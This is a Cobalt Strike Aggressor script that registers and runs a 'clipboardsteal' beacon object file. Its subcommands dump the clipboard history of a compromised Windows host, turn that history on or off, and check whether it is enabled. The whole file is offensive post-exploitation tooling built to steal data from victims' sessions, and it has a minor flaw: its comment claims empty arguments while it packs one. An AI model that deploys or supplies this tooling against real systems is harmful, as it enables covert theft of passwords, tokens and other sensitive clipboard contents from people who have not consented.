# Register command
beacon_command_register(
    "clipboardsteal",
    "BOF clipboardsteal",
    "Use: clipboardsteal [cmd]
    Command         Description
    dump            Dumps the content of the clipboard history to console.
    enable          Enables the clipboard history feature.
    disable         Disables the clipboard history feature.
    check           Checks if clipboard history feature is enabled.
    help            Shows this help menu."
);

alias clipboardsteal {
    local('$bid $barch $handle $data $args');
    $bid = $1;
    $arg = $2;

    # Figure out the arch of this session
    $barch = barch($bid);

    # Read in the right BOF file from the 'dist' directory
    # Note: script_resource looks relative to where this .cna file is loaded
    $handle = openf(script_resource("dist/BOF. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);
    
    # Pack empty arguments since no args are required
    $args = bof_pack($1,"z", $2);

    # Announce what we're doing
    btask($bid, "Starting BOF...");

    # Execute it
    beacon_inline_execute($bid, $data, "go", $args);
}
